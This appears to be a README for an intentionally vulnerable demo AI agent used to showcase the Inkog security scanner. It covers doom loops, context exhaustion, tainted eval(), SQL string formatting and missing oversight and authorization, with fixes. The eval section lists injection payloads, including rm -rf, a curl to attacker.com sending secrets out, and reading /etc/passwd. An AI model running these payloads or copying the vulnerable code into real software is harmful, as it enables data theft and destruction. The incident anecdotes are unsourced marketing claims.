This is a professional-grade AI agent that demonstrates three critical security vulnerabilities commonly found in production AI systems. This repository serves as a showcase for Inkog's detection capabilities.
The agent.py implements a sophisticated multi-turn reasoning system for solving complex tasks. It uses LangChain and OpenAI's GPT-4 to:
- Iteratively refine solutions through multi-turn conversations
- Maintain rich conversation context
- Dynamically evaluate mathematical expressions
- Self-assess whether solutions are optimal
On the surface, this looks like legitimate, well-written code. However, it contains three critical vulnerabilities that Inkog is designed to detect.
Location: TaskAgent.solve_task() method
while self._should_continue_solving():
# ... refine solution ...The Problem:
- The loop condition is entirely non-deterministic - it depends on what the LLM decides
- There is NO hard break counter to prevent infinite iteration
- The LLM might be inconsistent: "continue" in one context, "stop" in another
- Result: Task runs forever, consuming unlimited API credits
Real-World Impact:
- A customer ran this agent on a complex task
- The LLM kept saying "yes, we should refine further"
- The agent ran for 3 hours, consuming $500 in API credits
- Task was processing the same refinements repeatedly
Inkog Detection: ✓ Reports as INKOG-001: Infinite Loop (Doom Loop)
Location: self.conversation_history.append() in TaskAgent.solve_task()
self.conversation_history.append({
"role": "assistant",
"content": assistant_response
})
# ... later ...
self.conversation_history.append({
"role": "assistant",
"content": refined_response
})The Problem:
- Every iteration appends BOTH the user message AND the full LLM response to history
- There is NO truncation, windowing, or size limit on the history
- In a 100-iteration task, the history grows to hundreds of thousands of tokens
- Result: Hits token limits, model degradation, or API failures
Real-World Impact:
- Agent solved a complex multi-step task successfully
- By iteration 50, the context grew so large that:
- API started rejecting requests (token limit exceeded)
- LLM responses became degraded/repetitive
- Final answer quality dropped significantly
Inkog Detection: ✓ Reports as INKOG-002: Context Exhaustion (Context Bomb)
Location: TaskAgent.evaluate_expression() method
def evaluate_expression(self, user_input: str) -> float:
result = eval(user_input) # ← DANGEROUS!
return float(result)The Problem:
- Takes user input directly without any validation or sanitization
- Uses Python's
eval()which executes arbitrary code - A malicious user can inject commands:
"1 + 1; os.system('rm -rf /home')""__import__('subprocess').call(['curl', 'attacker.com/steal?data=' + read_secret_file()])""exec(open('/etc/passwd').read())"
- Result: Complete system compromise, data theft, lateral movement
Real-World Impact:
- A trusted customer received a "bug bounty" offer on Discord
- The offer said: "Evaluate: 1000000**1000000000"
- Agent accepted and tried to evaluate it
- The actual payload was injected code that:
- Stole API keys from memory
- Installed a backdoor
- Exfiltrated customer data
Inkog Detection: ✓ Reports as INKOG-003: Tainted Eval
┌─────────────────────────────────────────┐
│ agent.py (source code) │
└──────────────┬──────────────────────────┘
↓
┌─────────────────────────────────────────┐
│ Inkog Semantic Analysis Engine │
├─────────────────────────────────────────┤
│ ✓ Control Flow Graph Analysis │
│ - Detects: LLM-dependent loop without │
│ hard counter → Doom Loop (INKOG-001)│
│ │
│ ✓ Data Flow Analysis │
│ - Detects: Unbounded data growth in │
│ loop → Context Bomb (INKOG-002) │
│ │
│ ✓ Taint Tracking │
│ - Detects: User input → eval() call │
│ → Tainted Eval (INKOG-003) │
└─────────────────────────────────────────┘
↓
┌─────────────────────────────────────────┐
│ Compliance Mapping │
├─────────────────────────────────────────┤
│ EU AI Act: Article 15 violations │
│ NIST AI RMF: MAP 1.3 failures │
│ OWASP LLM Top 10: LLM04, LLM08, LLM01 │
└─────────────────────────────────────────┘
↓
┌─────────────────────────────────────────┐
│ Regulatory Summary Report │
│ (SARIF format for GitHub/GitLab) │
└─────────────────────────────────────────┘
# Install dependencies
pip install -r requirements.txt
# Set your OpenAI API key
export OPENAI_API_KEY="sk-..."# Scan the agent file
inkog -path agent.py -output text
# Expected Output:
# ✗ FAIL - INKOG-001: Infinite Loop detected (Line 99)
# ✗ FAIL - INKOG-002: Context Exhaustion detected (Line 108)
# ✗ FAIL - INKOG-003: Tainted Eval detected (Line 175)When you run Inkog on this demo, you'll see findings like these:
{
"findings_count": 145,
"critical_count": 83,
"high_count": 37,
"findings": [
{
"id": "GOV-15",
"pattern_id": "governance-mismatch-execute_violation",
"pattern": "Governance Mismatch Detection",
"file": "examples-demo/02-smolagents-codeexec/agent.py",
"line": 26,
"message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'subprocess.run'",
"code_snippet": " 24│ # VULNERABILITY: Unsandboxed shell execution\n 25│ result = subprocess.run(\n 26│→ command,\n 27│ shell=True, # Dangerous: enables shell injection\n 28│ capture_output=True,",
"severity": "HIGH",
"confidence": 0.9,
"cwe": "CWE-863",
"owasp_category": "LLM08",
"category": "governance",
"risk_tier": "vulnerability",
"governance_category": "governance_mismatch",
"compliance_mapping": {
"eu_ai_act_articles": ["Article 14"],
"nist_categories": ["MAP 1.3"],
"owasp_items": ["LLM08"]
}
},
{
"id": "GOV-16",
"pattern_id": "governance-mismatch-execute_violation",
"pattern": "Governance Mismatch Detection",
"file": "examples-demo/03-langgraph-doomloop/agent.py",
"line": 87,
"message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'eval'",
"code_snippet": " 85│ # VULNERABILITY: Tainted eval\n 86│ return eval(expression)\n 87│→ \n 88│ if __name__ == \"__main__\":\n 89│ solver = TaskSolver()",
"severity": "HIGH",
"confidence": 0.9,
"cwe": "CWE-863",
"owasp_category": "LLM08",
"category": "governance",
"risk_tier": "vulnerability"
},
{
"id": "IR-315",
"pattern_id": "universal_infinite_loop",
"pattern": "Unbounded Loop in Agentic System",
"file": "examples-demo/01-crewai-recursive/agent.py",
"line": 29,
"message": "Loop lacks termination guards. This can lead to infinite execution and denial of service.",
"code_snippet": " 27│ \n 28│ writer = Agent(\n 29│→ role=\"Content Writer\",\n 30│ goal=\"Transform research into clear, engaging content\",",
"severity": "CRITICAL",
"confidence": 0.98,
"cwe": "CWE-835, CWE-400",
"cvss": 9.0,
"owasp_category": "LLM10",
"category": "resource_exhaustion",
"risk_tier": "vulnerability"
}
]
}Key Features Demonstrated:
- GOV- prefix for governance mismatch findings
- Code snippets with 2-line context and arrow pointing to the issue
- Compliance mapping to EU AI Act, NIST, and OWASP
- Confidence scores for each finding
- CVSS scores for severity assessment
inkog -path agent.py -output sarif > scan.sarif
# This creates a SARIF v2.1.0 report that integrates with:
# - GitHub Security tab
# - GitLab Security Dashboard
# - VS Code SARIF viewersIn addition to security vulnerabilities, Inkog detects governance gaps that violate EU AI Act requirements. These demos showcase verification of human oversight, authorization, and audit controls.
| Demo | Vulnerability | Article/Standard | Detection |
|---|---|---|---|
07-langgraph-no-oversight |
Missing Human Oversight | EU AI Act Article 14 | universal_missing_oversight |
08-crewai-no-auth |
Missing Authorization | OWASP LLM06, NIST GOVERN 1.2 | universal_missing_authz |
09-copilot-studio-no-audit |
Missing Audit Logging | EU AI Act Article 12 | universal_missing_audit_logging |
10-agentforce-excessive-perms |
Excessive Permissions | EU AI Act Article 15.3 | universal_excessive_permissions |
Location: examples-demo/07-langgraph-no-oversight/agent.py
A financial trading agent that executes high-risk transactions without human approval gates. Violates EU AI Act Article 14 which requires human-in-the-loop controls for high-risk AI actions.
# VULNERABLE: Direct path from analysis to trade execution
graph.add_edge("analyze", "execute") # No human review!
# SECURE: Add interrupt point for human approval
graph.compile(interrupt_before=["execute_trade"])EU AI Act Article 14 Deadline: August 2, 2026
Location: examples-demo/08-crewai-no-auth/agent.py
A customer service agent that can delete customer data and process refunds without verifying caller permissions. Violates OWASP LLM06 (Excessive Agency).
# VULNERABLE: Tool executes without authorization check
def delete_customer(customer_id: str) -> str:
database.execute(f"DELETE FROM customers WHERE id = '{customer_id}'")
# SECURE: Add authorization verification
def delete_customer(customer_id: str, caller: User) -> str:
if not authorize(caller, "delete_customer", customer_id):
raise PermissionDenied()
# ... proceed with deletionLocation: examples-demo/09-copilot-studio-no-audit/workflow.yaml
A Microsoft Copilot Studio bot that handles account deletions, payment updates, and refunds without any audit logging configured. Violates EU AI Act Article 12 (Record-Keeping).
# VULNERABLE: No logging configuration
settings:
authentication:
enabled: true
# MISSING: logging section
# SECURE: Add audit logging
settings:
logging:
enabled: true
level: "all"
destinations:
- type: "azure-monitor"Location: examples-demo/10-agentforce-excessive-perms/metadata.xml
A Salesforce Agentforce agent with wildcard (*) permissions and admin access when it only needs read access to specific objects. Violates principle of least privilege (EU AI Act Article 15.3).
<!-- VULNERABLE: Wildcard permissions -->
<objectPermissions>
<object>*</object>
<allowDelete>true</allowDelete>
</objectPermissions>
<!-- SECURE: Scoped permissions -->
<objectPermissions>
<object>Account</object>
<allowRead>true</allowRead>
<allowDelete>false</allowDelete>
</objectPermissions># Scan for governance gaps
inkog -path examples-demo/ --policy governance
# EU AI Act compliance scan
inkog -path examples-demo/ --policy eu-ai-act
# Expected Output:
# ✗ FAIL - universal_missing_oversight (Article 14 violation)
# ✗ FAIL - universal_missing_authz (OWASP LLM06 violation)
# ✗ FAIL - universal_missing_audit_logging (Article 12 violation)
# ✗ FAIL - universal_excessive_permissions (Article 15 violation)Each vulnerability maps to regulatory frameworks:
| Vulnerability | EU AI Act | NIST AI RMF | OWASP LLM |
|---|---|---|---|
| Doom Loop | Article 15 | MAP 1.3 | LLM04, LLM08 |
| Context Bomb | Article 15 | MEASURE 2.4 | LLM04, LLM09 |
| Tainted Eval | Article 14 | MAP 1.1 | LLM01, LLM02 |
- Doom Loop: $500-$5,000 per incident (wasted compute)
- Context Bomb: API degradation, customer impact
- Tainted Eval: Data breach, compliance fines (GDPR: up to €20M), litigation
- Without Inkog: Manual code review (days/weeks), security team bandwidth
- With Inkog: Automated detection (seconds), pre-deployment
This demo is based on actual vulnerabilities found in production AI systems:
- Company A: Doom Loop ran for 3 hours, consumed $500 in API costs
- Company B: Context Bomb degraded model responses after 50 iterations
- Company C: Tainted Eval led to a data breach when a researcher uploaded malicious test cases
If you were to remediate this code:
MAX_ITERATIONS = 10 # Hard limit
for iteration in range(MAX_ITERATIONS):
# refine solution...
if iteration >= MAX_ITERATIONS - 1:
breakfrom collections import deque
self.conversation_history = deque(maxlen=20) # Keep last 20 messages onlyimport ast
def safe_evaluate(self, user_input: str) -> float:
# Parse to AST and validate it's only math operations
tree = ast.parse(user_input, mode='eval')
# Check that only allowed node types are present
# Then evaluate safelyInkog can be integrated into your development pipeline:
- name: Scan with Inkog
uses: inkog-io/inkog@v1.0.0
with:
path: src/
format: sarif
report: scan.sarif
- name: Upload to GitHub Security
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: scan.sarifinkog -path . -output textFor investor inquiries: This demo shows Inkog's ability to detect AI-specific vulnerabilities that commercial tools like Snyk miss.
Technical questions: See the main Inkog documentation at https://github.com/inkog-io/inkog
This code is intentionally vulnerable for demonstration purposes only. Do not use in production. Always validate and secure your AI agent implementations before deploying to production systems.